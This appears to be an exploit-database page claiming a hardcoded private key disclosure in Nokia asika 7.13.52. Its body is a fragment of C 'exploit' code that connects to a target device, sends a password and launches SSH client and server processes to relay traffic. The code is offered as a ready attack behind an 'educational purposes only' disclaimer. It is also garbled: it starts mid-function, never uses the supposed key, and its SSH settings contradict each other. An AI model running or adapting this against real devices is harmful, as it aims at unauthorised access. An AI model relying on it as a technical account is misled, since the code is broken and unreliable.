Nokia asika 7.13.52 hardcoded private key disclosure Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-06-20 |
Type : remote |
Platform : hardware
This exploit / vulnerability Nokia asika 7.13.52 hardcoded private key disclosure is for educational purposes only and if it is used you will do on your own risk!
// Create a new socket
sock = socket(AF_INET, SOCK_STREAM, 0);
// Set the address to connect to
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_pton(AF_INET, host, &addr.sin_addr);
// Connect to the vulnerable device
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
{
fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));
exit(1);
}
// Send the password
write(sock, password, strlen(password));
write(sock, "\r\n", 2);
// Wait for the authentication to complete
sleep(1);
// Start an SSH client on the attacker's machine
pid1 = fork();
if (pid1 == 0)
{
execv("/usr/bin/ssh", argv);
exit(0);
}
// Start an SSH server on the attacker's machine
pid2 = fork();
if (pid2 == 0)
{
execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);
exit(0);
}
// Wait for the SSH server to start
sleep(1);
// Forward data between the client and the server
pid1 = fork();
if (pid1 == 0)
{
forward_data(sock, STDIN_FILENO);
exit(0);
}
pid2 = fork();
if (pid2 == 0)
{
forward_data(STDOUT_FILENO, sock);
exit(0);
}
// Wait for the child processes to finish
waitpid(pid1, NULL, 0);
waitpid(pid2, NULL, 0);
// Close the socket
close(sock);
return 0;
}
Nokia asika 7.13.52 hardcoded private key disclosure